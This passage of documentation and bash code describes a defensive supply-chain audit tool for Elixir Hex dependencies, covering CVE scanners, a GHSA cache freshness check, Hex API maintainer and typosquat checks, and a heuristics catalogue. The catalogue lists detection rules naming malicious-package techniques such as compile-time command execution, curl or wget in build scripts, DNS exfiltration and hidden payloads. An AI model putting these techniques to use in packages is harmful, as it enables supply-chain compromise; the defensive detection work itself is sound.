          # mutate the project's mix.lock (Iron Law #2). Strategy: copy the
          # project to a tmpdir, swap in the requested lock, run mix
          # deps.audit, discard.
          _mix_audit_run_with_lock "${lock_file}" "${out_path}"
        fi
      }
      
      # Phase 5 — differential CVE pass.
      #
      # Run mix_audit against both OLD and NEW mix.lock states to detect
      # CVEs patched by the update (the actionable narrative — "you were
      # exposed for N days"). Use tmpdir copy strategy because:
      #   - MIX_LOCKFILE env var is not Mix-supported as of 1.18.
      #   - git worktree mutates .git/ and creates branch state.
      #   - tmpdir copy is the simplest non-mutating option.
      #
      # Inputs (env):
      #   OLD_LOCK_FILE — path to OLD mix.lock (e.g., from `git show HEAD:mix.lock`)
      #   NEW_LOCK_FILE — path to NEW mix.lock (default: working mix.lock)
      #
      # Outputs (under per-run tmpdir — see references/audit-tmpdir.md):
      #   ${AUDIT_TMPDIR}/cves_old.json
      #   ${AUDIT_TMPDIR}/cves_new.json
      mix_audit_diff() {
        local old_lock="${OLD_LOCK_FILE:?OLD_LOCK_FILE required for differential pass}"
        local new_lock="${NEW_LOCK_FILE:-mix.lock}"
        : "${AUDIT_TMPDIR:?AUDIT_TMPDIR not set — driver must establish per-run tmpdir first}"
      
        LOCK_FILE="${old_lock}" MIX_AUDIT_OUT="${AUDIT_TMPDIR}/cves_old.json" \
          mix_audit_run
      
        LOCK_FILE="${new_lock}" MIX_AUDIT_OUT="${AUDIT_TMPDIR}/cves_new.json" \
          mix_audit_run
      }
      
      # Internal: run mix deps.audit against an arbitrary mix.lock without
      # mutating the project. Copies project to tmpdir, swaps lock, runs.
      #
      # Defense-in-depth for Iron Law #2: unsets MIX_* env vars that could
      # otherwise redirect Mix back to the real project (MIX_DEPS_PATH,
      # MIX_LOCKFILE, MIX_PROJECT, etc.). MIX_HOME is preserved so the Hex
      # cache is reused.
      _mix_audit_run_with_lock() {
        local lock_src="$1" out_path="$2"
      
        # Fail fast if the requested lock doesn't exist. Silent fall-through
        # would produce a false-green ("no vulnerabilities") report — the
        # worst possible failure mode for a security tool.
        if [ ! -f "${lock_src}" ]; then
          echo "ERROR: lock file not found: ${lock_src}" >&2
          return 2
        fi
      
        local tmpdir
        tmpdir="$(mktemp -d -t deps-audit-XXXXXX)" || {
          echo "ERROR: mktemp failed" >&2
          return 2
        }
        # Trap cleanup at function scope — caller may have its own EXIT trap.
        # shellcheck disable=SC2064
        trap "rm -rf '${tmpdir}'" RETURN
      
        # Reflink/hardlink-friendly copy. Exclude _build and deps to keep
        # the copy cheap; mix will resolve deps from Hex cache anyway.
        cp mix.exs "${tmpdir}/" 2>/dev/null || true
        [ -f mix.exs.lock ] && cp mix.exs.lock "${tmpdir}/" 2>/dev/null || true
        [ -d config ] && cp -R config "${tmpdir}/" 2>/dev/null || true
        # cp -L: dereference symlinks (don't trust a symlinked lock to point
        # where the caller thinks). Bubble cp failure to the caller.
        if ! cp -L "${lock_src}" "${tmpdir}/mix.lock"; then
          echo "ERROR: cannot copy ${lock_src} to tmpdir" >&2
          return 2
        fi
      
        (
          cd "${tmpdir}" || exit 1
          # Defense-in-depth: scrub MIX_* vars that could redirect Mix to
          # the real project. Keep MIX_HOME (Hex cache reuse) and PATH.
          unset MIX_DEPS_PATH MIX_BUILD_PATH MIX_LOCKFILE MIX_PROJECT MIX_ENV
          # mix deps.audit doesn't require deps to be fetched — it reads the
          # lock and queries the local GHSA cache. Avoid `mix deps.get` to
          # keep the run offline-fast and non-mutating.
          mix deps.audit --format json 2>/dev/null > "${out_path}"
        )
      }
      
      # Internal: when mix_audit is skipped because not installed, check if
      # the diff contains packages with recent EEF CNA CVEs and emit a loud
      # alert. The 2026-05-13 enaia-main dogfood exposed this gap: a diff
      # touched `decimal 2.3 → 2.4`, `phoenix 1.8.5 → 1.8.7`, `postgrex 0.22.0
      # → 0.22.2` — all three patch real EEF CNA CVEs (32686/32689/32687) —
      # and the audit emitted the same generic "install mix_audit" hint as
      # for any other skip, with no signal that this specific diff would have
      # triggered three CVE matches.
      #
      # The corpus list is hand-curated from cna.erlef.org and refreshed in
      # tandem with smoke fixtures (corpus.d/). Conservative pattern: only
      # packages with at least one published CVE in the last 12 months.
      _mix_audit_warn_cve_corpus_overlap() {
        local diff_json="${AUDIT_TMPDIR:-}/diff.json"
        [ -f "${diff_json}" ] || return 0
      
        # Subset of EEF CNA-tracked Hex packages with recent CVEs. Keep
        # narrow — false positives here erode trust faster than misses.
        local corpus="decimal phoenix postgrex bandit cowlib plug ecto"
        local hits=()
        for pkg in ${corpus}; do
          if jq -e --arg p "${pkg}" '.changed[]? | select(.package == $p)' \
               "${diff_json}" >/dev/null 2>&1; then
            hits+=("${pkg}")
          fi
        done
      
        [ "${#hits[@]}" -eq 0 ] && return 0
      
        cat <<EOF
      
      🚨 mix_audit is not installed AND this diff touches packages with
         known recent CVEs on the EEF CNA list: ${hits[*]}
      
         The audit cannot confirm whether this update patches or introduces
         any of those CVEs. Install mix_audit and re-run for coverage:
      
           mix archive.install hex mix_audit
      
         Canonical Elixir CVE list: https://cna.erlef.org/cves/
      EOF
      }
      
      # Internal: warn if the GHSA cache is staler than GHSA_MAX_AGE_HOURS.
      # The mix_audit Hex package ships its advisory database as part of the
      # Hex archive; it's refreshed when the user runs `mix deps.audit`
      # directly, but the cache itself can lag behind cna.erlef.org.
      _mix_audit_check_ghsa_freshness() {
        local max_age="${GHSA_MAX_AGE_HOURS:-24}"
        local cache_dir=""
      
        # Locate the GHSA advisory cache. mix_audit stores it under
        # _build/<env>/lib/mix_audit/priv/advisories/ when installed as a dep,
        # or under ~/.mix/archives/ when installed as an archive. Try both.
        for candidate in \
          "_build/dev/lib/mix_audit/priv/advisories" \
          "_build/test/lib/mix_audit/priv/advisories" \
          "$HOME/.mix/archives/mix_audit"*; do
          if [ -d "${candidate}" ]; then
            cache_dir="${candidate}"
            break
          fi
        done
      
        [ -z "${cache_dir}" ] && return 0  # Can't locate cache — skip warn.
      
        local mtime now age_hours
        # macOS stat -f %m, GNU stat -c %Y. Try both.
        mtime="$(stat -f %m "${cache_dir}" 2>/dev/null || stat -c %Y "${cache_dir}" 2>/dev/null)"
        [ -z "${mtime}" ] && return 0
      
        now="$(date +%s)"
        age_hours=$(( (now - mtime) / 3600 ))
      
        if [ "${age_hours}" -gt "${max_age}" ]; then
          cat <<EOF
      WARN: GHSA advisory cache is ${age_hours} hours old (>${max_age}h threshold).
      Recent disclosures (last 7 days) may be missing. Refresh with:
      
          mix deps.update mix_audit  # if installed as dep
          mix archive.install hex mix_audit --force  # if installed as archive
      
      Canonical Elixir CVE list: https://cna.erlef.org/cves/
      EOF
          return 1
        fi
        return 0
      }
      ```
      
      Output is JSON:
      
      ```json
      {
        "pass": false,
        "vulnerabilities": [
          {
            "advisory": {"id": "GHSA-xxxx-xxxx-xxxx", "cve": "CVE-2026-12345",
                         "title": "...", "description": "...",
                         "severity": "high", "patched_versions": "~> 1.2.3"},
            "dependency": {"package": "...", "version": "..."}
          }
        ]
      }
      ```
      
      Severity mapping: `critical` / `high` → BLOCK · `moderate` → WARN ·
      `low` → INFO.
      
      **FP rate:** ~0% (advisory DB is curated). Coverage gap: GHSA has fewer Hex
      entries than npm/RustSec, so absence is not proof of safety.
      
      ## 2a. GHSA cache freshness (Phase 5)
      
      `mix_audit` ships its GHSA advisory database as part of the Hex package
      or archive. The advisory DB is **not** refreshed automatically on each
      `mix deps.audit` invocation — it updates only when the user explicitly
      runs `mix deps.update mix_audit` or `mix archive.install hex mix_audit
      --force`.
      
      This matters because the EEF CNA disclosure cadence has accelerated:
      14 Hex package CVEs were published in April-May 2026 alone (e.g.,
      `postgrex 0.22.0 → 0.22.1` patched a SQL-injection CVE disclosed
      **the same day** the 2026-05-12 virgil dogfood ran). A 1-week-old
      advisory cache will miss these.
      
      **Behavior:** `mix_audit_run` checks the mtime of the GHSA advisory
      directory before running. If older than `GHSA_MAX_AGE_HOURS` (default
      24), it emits a WARN to stderr with refresh instructions and a link to
      the canonical EEF CNA list (<https://cna.erlef.org/cves/>).
      
      **How to refresh manually:**
      
      ```bash
      # If installed as a dep in mix.exs:
      mix deps.update mix_audit
      
      # If installed as a Mix archive:
      mix archive.install hex mix_audit --force
      
      # Verify freshness:
      ls -la _build/dev/lib/mix_audit/priv/advisories/ | head
      ```
      
      **Override the threshold:**
      
      ```bash
      GHSA_MAX_AGE_HOURS=72 /phx:deps-audit  # tolerate 3-day-old cache
      GHSA_MAX_AGE_HOURS=1  /phx:deps-audit  # paranoid mode
      ```
      
      **Future (Phase 6+):** auto-refresh via a PreToolUse hook that watches
      for `mix deps.audit` invocations and triggers `mix deps.update mix_audit`
      if the cache is >24h old. Deferred until we can prove the refresh
      itself is non-flaky (Hex registry can rate-limit or 503).
      
      **Why not a `mix deps.update`?** Mutating `mix.lock` violates Iron
      Law #2. The wrapper warns and continues — the user must refresh
      explicitly. This is consent-resistant by the same logic as the
      mix_audit-install refusal above.
      
      ## 3. `osv-scanner` — CVE check via OSV.dev
      
      Standalone Go binary (`go install github.com/google/osv-scanner@latest`).
      v2.3.5+ supports Elixir/Hex.
      
      ```bash
      osv_scan() {
        if ! command -v osv-scanner >/dev/null 2>&1; then
          cat >&2 <<'EOF'
      WARN: osv-scanner not installed — skipping CVE check via OSV.dev.
      
      To enable:
        go install github.com/google/osv-scanner@latest
        # or: brew install osv-scanner
      EOF
          return 0
        fi
      
        osv-scanner \
          --lockfile mix.lock \
          --format json \
        > "${AUDIT_TMPDIR}/osv-scan.json" 2>/dev/null || true
      }
      ```
      
      Output is JSON with `results[].packages[].vulnerabilities[]`. Each
      vulnerability has `id` (OSV ID), `aliases` (CVE list), `severity` (array of
      CVSS strings).
      
      Severity mapping: parse highest CVSS score from `severity[].score`:
      
      - ≥ 9.0 → BLOCK (critical)
      - ≥ 7.0 → BLOCK (high)
      - ≥ 4.0 → WARN (medium)
      - < 4.0 → INFO (low)
      
      **FP rate:** ~0%. **Why integrate both `mix_audit` and `osv-scanner`?** GHSA
      and OSV.dev have non-overlapping coverage. Running both catches more
      real-world CVEs.
      
      ## Aggregation into findings format
      
      Each external-tool finding maps to the same shape as MVP-rule findings,
      with `rule_id = "ext:<tool>"`:
      
      ```elixir
      %{
        rule_id: "ext:hex-audit" | "ext:mix-audit" | "ext:osv-scanner",
        severity: :block | :warn | :info,
        file: nil,         # CVEs are package-level, not file-level
        line: nil,
        snippet: "<advisory-id>",
        message: "<title or description>"
      }
      ```
      
      Attach to the per-package finding list before scoring.
      
      ## Parallelism
      
      All three tools run independently. Spawn in background:
      
      ```bash
      hex_audit &           pid_hex=$!
      mix_audit_run &       pid_mix=$!
      osv_scan &            pid_osv=$!
      
      wait $pid_hex $pid_mix $pid_osv
      ```
      
      `mix hex.audit` and `mix deps.audit` may contend on the `mix` lock; if so,
      serialize the two mix-based scanners and only parallelize `osv-scanner`.
      
      ## Exit-code handling
      
      | Tool | 0 | Non-zero |
      |------|---|----------|
      | `mix hex.audit` | No retirements | Retirements found (informational, NOT fatal) |
      | `mix deps.audit` | No CVEs | CVEs found |
      | `osv-scanner` | No CVEs | CVEs found OR scan error |
      
      Treat non-zero as "findings to parse", not "skill failure". The skill itself
      returns 0 unless the *audit infrastructure* fails (missing `mix`, bad
      network, corrupt cache).
      
      ## Why not Snyk / Phylum / Endor?
      
      | Tool | Why skipped |
      |------|-------------|
      | Snyk CLI | Paid for org use, signal duplicates `mix_audit` for free |
      | Phylum | Thin Hex support (per 2026 research) |
      | Endor Labs | No reliable BEAM reachability — not credible |
      | Semgrep SC | Paid tier; OSS Semgrep covered separately in Phase 2 |
      | Socket.dev | No Hex support; we **reimplement** their signal model |
      
      ## Future: SARIF output (Phase 2)
      
      `osv-scanner --format sarif` and `mix deps.audit --format sarif` (proposed)
      would let us emit a single SARIF file for GitHub Code Scanning. Deferred to
      Phase 2 alongside Semgrep ruleset.
      
    • heuristics.md 8.3 KB
      # Hex Supply-Chain Heuristics — Full Catalogue
      
      Full 35-rule catalogue. **Rules marked ✅ MVP are implemented in Phase 1.**
      Remaining rules are deferred to Phase 2.
      
      Severity scale:
      
      - **BLOCK** — high-confidence malicious indicator. Refuse to "pass" the audit.
      - **WARN** — suspicious but plausibly legitimate. Surface for human review.
      - **INFO** — context only, never alone.
      
      Scoring weights: BLOCK = 10 · WARN = 3 · INFO = 1.
      
      ## Category 1 — Compile-Time Code Execution (7 rules)
      
      | # | Rule | Sev | Method | FP | MVP |
      |---|------|-----|--------|----|-----|
      | 1.1 | Top-level expressions outside `def`/`defp`/`defmacro` body | WARN | AST module-body walk | ~5% | — |
      | 1.2 | `Code.eval_string` / `Code.eval_quoted` with non-literal arg | BLOCK | AST | ~1% | ✅ Rule 2 |
      | 1.3 | `:erlang.apply(Mod, Fun, Args)` with non-literal MFA at module scope | BLOCK | AST | ~1% | ✅ Rule 2 |
      | 1.4 | `System.cmd` / `:os.cmd` / `Port.open` at compile time | BLOCK | AST scope check | ~3% | ✅ Rule 3 |
      | 1.5 | `@on_load` / `@on_definition` callbacks | WARN | Attribute scan | ~10% | — |
      | 1.6 | Mix alias wrapping `deps.get` / `deps.update` | WARN | Parse `mix.exs` aliases | ~5% | — |
      | 1.7 | Excessive macro density (>20% of file is `defmacro`) | INFO | AST node counting | ~15% | — |
      
      ## Category 2 — Network Egress During Compile (5 rules)
      
      | # | Rule | Sev | Method | FP | MVP |
      |---|------|-----|--------|----|-----|
      | 2.1 | `:httpc.request` / `HTTPoison.*` / `Req.*` / `Tesla.*` at module load | BLOCK | AST scope check | ~2% | — (covered partially by 1.4 if shelling out) |
      | 2.2 | `:gen_tcp.connect` / `:ssl.connect` outside function bodies | BLOCK | AST | ~1% | — |
      | 2.3 | NIF socket calls (`:inet.*`) at compile time | BLOCK | AST | ~1% | — |
      | 2.4 | Webhook-style URLs (Discord/Slack/IPFS) in source | WARN | Regex on `.ex`/`.exs` | ~10% | — |
      | 2.5 | DNS exfil patterns (long subdomains, base64 in host) | WARN | Regex | ~12% | — |
      
      ## Category 3 — Obfuscation / Hidden Payloads (6 rules)
      
      | # | Rule | Sev | Method | FP | MVP |
      |---|------|-----|--------|----|-----|
      | 3.1 | Base64 string literals >256 chars outside `priv/static/`, `test/fixtures/`, `assets/` | WARN | Regex with directory exclude | ~8% | ✅ Rule 7 |
      | 3.2 | Hex binaries >128 bytes (`<<0x..., ...>>` literal) | WARN | AST literal scan | ~6% | — |
      | 3.3 | `:erlang.binary_to_term/1` on literal without `:safe` opt | BLOCK | AST | ~2% | ✅ Rule 4 |
      | 3.4 | Unicode homoglyph identifiers (Cyrillic/Greek lookalikes in `def` names) | WARN | Char-class regex | ~3% | — |
      | 3.5 | Bidi control characters in source (CVE-2021-42574 Trojan Source) | BLOCK | Grep `[‪-‮⁦-⁩؜‎‏]` | ~0% | ✅ Rule 1 |
      | 3.6 | String concat to hide reserved words (`"Sy" <> "stem" <> ".cmd"`) | WARN | AST concat-of-string-literals scan | ~5% | — |
      
      ## Category 4 — NIF / Port Driver Red Flags (4 rules)
      
      | # | Rule | Sev | Method | FP | MVP |
      |---|------|-----|--------|----|-----|
      | 4.1 | Native source presence (`c_src/`, `native/`, `.c`, `.rs`, `.zig`) | INFO | `find` | ~30% | — |
      | 4.2 | Build scripts invoking `curl` / `wget` / `sh -c` | BLOCK | Grep in `Makefile`, `*.sh`, `build.rs` | ~3% | — |
      | 4.3 | Precompiled binaries in `priv/` (any non-text file > 10KB) | WARN | `file -i` MIME check | ~15% | — |
      | 4.4 | `rustler` / `zigler` / `:erlang.load_nif` newly added | WARN | AST diff old vs new `mix.exs` | ~10% | — |
      
      ## Category 5 — Typosquatting & Impersonation (5 rules)
      
      | # | Rule | Sev | Method | FP | MVP |
      |---|------|-----|--------|----|-----|
      | 5.1 | Levenshtein ≤ 2 from top-500 Hex packages + download delta >1000× | BLOCK | Hex API + fuzzy distance | ~1% | ✅ Rule 8 |
      | 5.2 | Homoglyph package names (`phoeniх` with Cyrillic х) | BLOCK | Unicode confusable check | ~0.5% | — |
      | 5.3 | Identical package description but different author | WARN | Hex API description diff | ~5% | — |
      | 5.4 | New author + sudden traction (>1k DLs in week 1) | WARN | Hex API + insertedat math | ~8% | — |
      | 5.5 | Cross-ecosystem name reuse (npm/PyPI package with same name + different author) | INFO | npm/PyPI registry lookup | ~20% | — |
      
      ## Category 6 — Maintainer / Publishing Signals (5 rules)
      
      | # | Rule | Sev | Method | FP | MVP |
      |---|------|-----|--------|----|-----|
      | 6.1 | Maintainer change between versions | BLOCK | Hex API `owners` diff | ~2% | ✅ Rule 6 |
      | 6.2 | Single-maintainer package with >500 transitive dependents | INFO | Hex API + reverse deps | ~0% | — |
      | 6.3 | Anomalous version bump (major skip, non-semver) | WARN | Version string parsing | ~5% | — |
      | 6.4 | `days_since_publish < 7` ("let it cook" rule) | WARN | Hex API `inserted_at` | ~30% | — |
      | 6.5 | Yank-then-republish at same version | BLOCK | Hex API `retirements` history | ~0.5% | — |
      
      ## Category 7 — Diff-Based Checks (6 rules)
      
      | # | Rule | Sev | Method | FP | MVP |
      |---|------|-----|--------|----|-----|
      | 7.1 | New top-level expressions vs old version | WARN | AST diff of module bodies | ~7% | — |
      | 7.2 | New `System.cmd` / network calls vs old | BLOCK | AST diff | ~4% | — |
      | 7.3 | New files in `priv/` (esp. binary) | WARN | `diff` of file lists | ~10% | — |
      | 7.4 | New `:git` / `:path` dep in `mix.exs` | BLOCK | AST diff of `deps/0` | ~5% | ✅ Rule 5 |
      | 7.5 | License change between versions | WARN | Read `LICENSE` / `mix.exs` `:licenses` | ~5% | — |
      | 7.6 | `.hex` / `metadata.config` tampering (checksum mismatch) | BLOCK | `mix hex.audit` already covers retirement; this extends | ~1% | — |
      
      ## Category 8 — Mix-Specific (4 rules)
      
      | # | Rule | Sev | Method | FP | MVP |
      |---|------|-----|--------|----|-----|
      | 8.1 | `:git` / `:path` dep in `mix.exs` (any, not just new) | INFO | Parse `mix.exs` | ~40% (legit local dev) | — |
      | 8.2 | Custom compilers (`:compilers` modified) | WARN | Parse `project/0` | ~10% | — |
      | 8.3 | Aliases wrapping `deps.get` / `deps.update` | WARN | Parse aliases | ~5% | — |
      | 8.4 | `override: true` on transitive deps | INFO | Parse `deps/0` | ~20% | — |
      
      ## MVP Summary — 8 Rules
      
      The 8 MVP rules (Phase 1) target the highest-confidence indicators with
      aggregate FP <5%:
      
      | MVP # | From | Rule |
      |-------|------|------|
      | 1 | 3.5 | Bidi Unicode control chars |
      | 2 | 1.2 + 1.3 | `Code.eval_*` / `:erlang.apply` non-literal at module scope |
      | 3 | 1.4 | `System.cmd` / `:os.cmd` / `Port.open` at compile time |
      | 4 | 3.3 | `:erlang.binary_to_term/1` literal without `:safe` |
      | 5 | 7.4 | New `:git`/`:path` dep vs old `mix.exs` |
      | 6 | 6.1 | Maintainer change between versions |
      | 7 | 3.1 | Base64 >256 chars outside allowlisted dirs |
      | 8 | 5.1 | Typosquat: Levenshtein ≤ 2 + download delta >1000× |
      
      Covers Trojan Source, compile-time RCE, BEAM deser, dep confusion,
      account takeover, and typosquatting. Each finding shape:
      
      ```elixir
      %{
        rule_id: 1..8,
        severity: :block | :warn | :info,
        file: "lib/foo.ex" | nil,
        line: integer | nil,
        snippet: "...",
        message: "..."
      }
      ```
      
      ## Prior Art
      
      - **Trojan Source / CVE-2021-42574** — bidi control chars in source. Rule 1.
      - **diff-CodeQL (Froh et al., SCORED '23)** — 41 CodeQL queries on npm diffs,
        1.4% FP. Rules 7.1–7.4 port the diff-of-findings pattern.
      - **Socket.dev signal model** — multi-signal scoring. Our weighted sum is a
        simplified version.
      - **`cargo-vet` audit ledger** — Phase 2 `hex_vet.exs` ledger derives from it.
      - **`npq` pre-flight pattern** — score before download. Mode A (`--preview`)
        replicates this.
      - **CVE-2026-21619** — `hex_core` unsafe `binary_to_term` (RCE). Motivates
        Rule 4.
      
      ## Tuning Notes
      
      - Rule 7 (base64) dominates noise. If FP rate exceeds 10% in real use,
        raise threshold to 512 chars or add more exclude directories.
      - Rule 8 (typosquat) requires daily refresh of top-500 list. Cache in
        `${AUDIT_TMPDIR}/hex-api/top-500.json` with 24h TTL.
      - Rule 6 (maintainer change) needs cross-referencing release timestamps
        with owner-list timestamps. Hex API `inserted_at` per release helps.
      
      ## Out of Scope (Phase 2)
      
      - Differential rules 7.1–7.6 (full old vs new diff per file) — currently
        only 7.4 (`mix.exs` deps) is in MVP because it's the cheapest diff.
      - All NIF rules (Category 4) — requires `file -i` MIME detection, deferred.
      - Semgrep ruleset (Category 1–2 expanded) — adds binary dependency.
      - YARA byte-pattern scan — adds binary dependency.
      - LLM triage on high-score findings — Phase 2 once FP rate proven.
      
    • hex-api.md 7.5 KB
      # Hex API Enrichment
      
      Adds metadata (owners, downloads, publish dates) to each audited package.
      Drives Rule 6 (maintainer change) and Rule 8 (typosquat download delta).
      
      ## Endpoints
      
      | Call | Endpoint | Why |
      |------|----------|-----|
      | Package metadata | `GET https://hex.pm/api/packages/:name` | Owners, downloads, inserted_at |
      | Per-release metadata | `GET https://hex.pm/api/packages/:name/releases/:version` | Per-release publisher, inserted_at |
      | Top-500 by downloads | `GET https://hex.pm/api/packages?sort=downloads&page=1..7` | Typosquat denominator (Rule 8) |
      
      All require `Accept: application/vnd.hex+json` header.
      
      ## Computed signals per package
      
      ```elixir
      %{
        pkg: "phoenix",
        owners: ["chrismccord", "josevalim", "..."],
        owner_age_days: 3650,             # min(inserted_at across owners)
        downloads_all: 50_000_000,
        downloads_recent: 800_000,         # weekly
        inserted_at: "2014-04-17T...",
        days_since_publish_latest: 14,
        download_velocity: 800_000 / 7,    # downloads/day, recent
        release_publisher: "josevalim"     # at the version being audited
      }
      ```
      
      ## Rate limit
      
      **5 req/sec.** Hex API doesn't publish official limits but the Hex.pm team
      has stated this is the polite ceiling.
      
      **Use `python3` + `urllib`, not curl.** A `curl "...${var}"` wrapper is
      fragile to whitespace/newline contamination in the interpolated path
      (dogfood: `curl: (3) Malformed input to a URL function`). `python3` is
      already a hard dependency of the audit and is robust here. Canonical:
      
      ```bash
      hex_api_get() {  # usage: hex_api_get <api-path>   e.g. packages/phoenix
        AUDIT_TMPDIR="$(cat "${TMPDIR:-/tmp}/phx-audit-dir.txt")"
        python3 - "$1" "$AUDIT_TMPDIR" <<'PY'
      import sys, os, json, time, urllib.request, pathlib
      path, tmp = sys.argv[1].strip(), sys.argv[2]
      cache = pathlib.Path(tmp, "hex-api", path.replace("/", "_") + ".json")
      ttl = 7 * 86400
      if cache.is_file() and time.time() - cache.stat().st_mtime < ttl:
          print(cache.read_text()); sys.exit(0)
      cache.parent.mkdir(parents=True, exist_ok=True)
      req = urllib.request.Request(
          "https://hex.pm/api/" + path,
          headers={"Accept": "application/vnd.hex+json",
                   "User-Agent": "phx-deps-audit/0.1 (+claude-elixir-phoenix)"})
      with urllib.request.urlopen(req, timeout=20) as r:
          body = r.read().decode()
      cache.write_text(body)
      time.sleep(0.2)   # 5 req/sec ceiling
      print(body)
      PY
      }
      ```
      
      The `sleep 0.2` blocks the calling process; keep Hex calls serial
      (parallelism 1) or the effective rate becomes `parallelism / 0.2`.
      
      > **curl fallback** (only if `python3` is unavailable, which the audit
      > otherwise assumes): `curl -fsSL -H "Accept: application/vnd.hex+json"
      > "https://hex.pm/api/${path}"` — but trim the path first
      > (`path="${path//[$'\n\r\t ']/}"`) to avoid the malformed-URL failure.
      
      ## Cache TTL
      
      | Resource | TTL | Justification |
      |----------|-----|---------------|
      | Package metadata | 7 days | Owners change rarely; we want fresh-ish data |
      | Per-release metadata | 30 days | Immutable once published |
      | Top-500 list | 24 hours | Daily refresh is industry standard |
      
      Override with `--no-cache` for debugging.
      
      ## Top-500 list — typosquat denominator
      
      ```bash
      fetch_top_500() {
        AUDIT_TMPDIR="$(cat "${TMPDIR:-/tmp}/phx-audit-dir.txt")"
        python3 - "$AUDIT_TMPDIR" <<'PY'
      import sys, time, json, urllib.request, pathlib
      cache = pathlib.Path(sys.argv[1], "hex-api", "top-500.json")
      if cache.is_file() and time.time() - cache.stat().st_mtime < 24 * 3600:
          sys.exit(0)
      cache.parent.mkdir(parents=True, exist_ok=True)
      out = []
      for page in range(1, 8):
          req = urllib.request.Request(
              f"https://hex.pm/api/packages?sort=downloads&page={page}",
              headers={"Accept": "application/vnd.hex+json"})
          with urllib.request.urlopen(req, timeout=20) as r:
              out += json.loads(r.read().decode())
          time.sleep(0.5)
      cache.write_text(json.dumps(out))
      PY
      }
      ```
      
      > curl fallback: same `for page in 1..7; curl … | jq -s 'add'` loop as
      > before — use only if `python3` is missing.
      
      7 pages × 100 packages/page = 700 entries; we use the first 500 (the tail
      has thin signal for typosquat denominator anyway). Total fetch: ~3 seconds
      on cold cache, free on warm.
      
      ## Computing signals
      
      ```bash
      package_signals() {
        local pkg="$1"
        local data
        data=$(hex_api_get "packages/${pkg}")
      
        jq -r --arg today "$(date -u +%Y-%m-%dT%H:%M:%SZ)" '
          {
            pkg: .name,
            owners: [.owners[]?.username],
            downloads_all: .downloads.all,
            downloads_recent: .downloads.recent,
            inserted_at: .inserted_at,
            latest_version: .releases[0].version,
            latest_version_inserted_at: .releases[0].inserted_at
          } | tojson
        ' <<<"${data}"
      }
      ```
      
      `owner_age_days` requires a second call per owner (to `/users/:username`)
      — deferred to Phase 2 to keep rate-limit pressure low. For Phase 1, we
      treat "owner list" as a static set and only diff between versions (Rule 6).
      
      ## Rule 6 — Maintainer change detector
      
      ```bash
      maintainer_change() {
        local pkg="$1" old_ver="$2" new_ver="$3"
      
        local old_pub new_pub
        old_pub=$(hex_api_get "packages/${pkg}/releases/${old_ver}" \
                  | jq -r '.publisher.username // empty')
        new_pub=$(hex_api_get "packages/${pkg}/releases/${new_ver}" \
                  | jq -r '.publisher.username // empty')
      
        if [ -n "${old_pub}" ] && [ -n "${new_pub}" ] && [ "${old_pub}" != "${new_pub}" ]; then
          echo "BLOCK|6|maintainer changed: ${old_pub} → ${new_pub}"
        fi
      }
      ```
      
      Note: `publisher` is the user who *published the release*. `owners` is the
      package-level list. The two CAN diverge (publisher is a delegate of an
      owner). For Phase 1 we flag *publisher* change at release boundary.
      
      ## Rule 8 — Typosquat detector
      
      ```bash
      typosquat_check() {
        local pkg="$1"
      
        # Pre-fetched top-500 list
        fetch_top_500
      
        jq -r --arg pkg "${pkg}" '
          .[] | select(.name != $pkg)
              | [.name, .downloads.all] | @tsv
        ' ${AUDIT_TMPDIR}/hex-api/top-500.json \
        | while IFS=$'\t' read -r candidate dl_count; do
            local dist
            dist=$(levenshtein "${pkg}" "${candidate}")
            if [ "${dist}" -le 2 ]; then
              local target_dl
              target_dl=$(hex_api_get "packages/${pkg}" | jq -r '.downloads.all // 0')
              if [ "${dl_count}" -gt $((target_dl * 1000)) ]; then
                echo "BLOCK|8|typosquat candidate: '${pkg}' (${target_dl} DLs) vs '${candidate}' (${dl_count} DLs, distance ${dist})"
              fi
            fi
          done
      }
      ```
      
      Levenshtein helper (inline awk impl or `string_distance` Hex pkg if
      available):
      
      ```bash
      levenshtein() {
        awk -v a="$1" -v b="$2" 'BEGIN {
          la = length(a); lb = length(b)
          if (la == 0) { print lb; exit }
          if (lb == 0) { print la; exit }
          for (i = 0; i <= la; i++) d[i,0] = i
          for (j = 0; j <= lb; j++) d[0,j] = j
          for (i = 1; i <= la; i++) for (j = 1; j <= lb; j++) {
            c = (substr(a,i,1) == substr(b,j,1)) ? 0 : 1
            v = d[i-1,j] + 1
            h = d[i,j-1] + 1
            diag = d[i-1,j-1] + c
            d[i,j] = (v < h ? (v < diag ? v : diag) : (h < diag ? h : diag))
          }
          print d[la,lb]
        }'
      }
      ```
      
      ## Failure modes
      
      | Failure | Behavior |
      |---------|----------|
      | Rate-limit response (429) | Sleep 5s, retry once. Second 429 → skip API enrichment for this pkg with WARN |
      | 404 on package | Mark `unknown` (likely renamed or removed); skip API rules |
      | Network timeout | Use stale cache if available; else skip with WARN |
      | Malformed JSON | Log + skip (Hex API is stable; this means corruption) |
      | Cache disk full | Bypass cache, fall back to direct call |
      
      ## Why no `mix hex.search` / `mix hex.info`?
      
      Both are interactive shells under the hood — slow to parse, not designed for
      machine output. Direct HTTP is 5-10× faster.
      
    • hook.md 5.4 KB
      # PreToolUse `deps-audit-gate.sh` — tiered fast-path
      
      Phase 3 wires the audit into the hot loop: every `mix deps.get`,
      `mix deps.update`, and `mix deps.compile` runs through a tiered hook
      before mix actually executes. The hook must stay invisible on the
      common path (sub-second), block on real risk, and never lock users out
      of their own machine.
      
      ## Why tiered
      
      A non-tiered hook would either:
      
      - **Run the full pipeline** (30-90s) on every `mix deps.get` — unusable
        during feature work where `deps.get` runs hourly.
      - **Cache the full audit** — but cache-fills are still 30-90s, and the
        first `mix deps.get` after a `mix.lock` change is the highest-anxiety
        moment.
      
      Three tiers split the workload so each `mix deps.*` invocation pays
      only for what changed:
      
      | Tier | Budget | Work | Exit |
      |------|--------|------|------|
      | 0 | <200ms | lock-SHA cache lookup | 0 silent |
      | 1 | <2s | bidi grep + `:git`/`:path` diff | 0 with hint, or 2 to block |
      | 2 | unbounded | full Phase 2 pipeline (only `:full` mode) | 0 or 2 |
      
      ## Tier 0: cache hit
      
      Read `.claude/deps-audit/last-run.json`. If the lock-SHA matches the
      cached run AND `audit_passed: true` AND the policy mode is unchanged,
      exit 0 immediately. Cost: one `shasum` + one `jq` per dep operation.
      
      The policy-mode equality check is necessary because a user who flipped
      from `false` to `:strict` between runs must not get a stale "passed"
      from the warn-only era.
      
      ## Tier 1: deterministic fast rules
      
      Only two Phase 1 rules run inline:
      
      - **Rule 1 — bidi/RLO chars in `mix.lock`.** One `perl` scan over a
        small file. Either present or not.
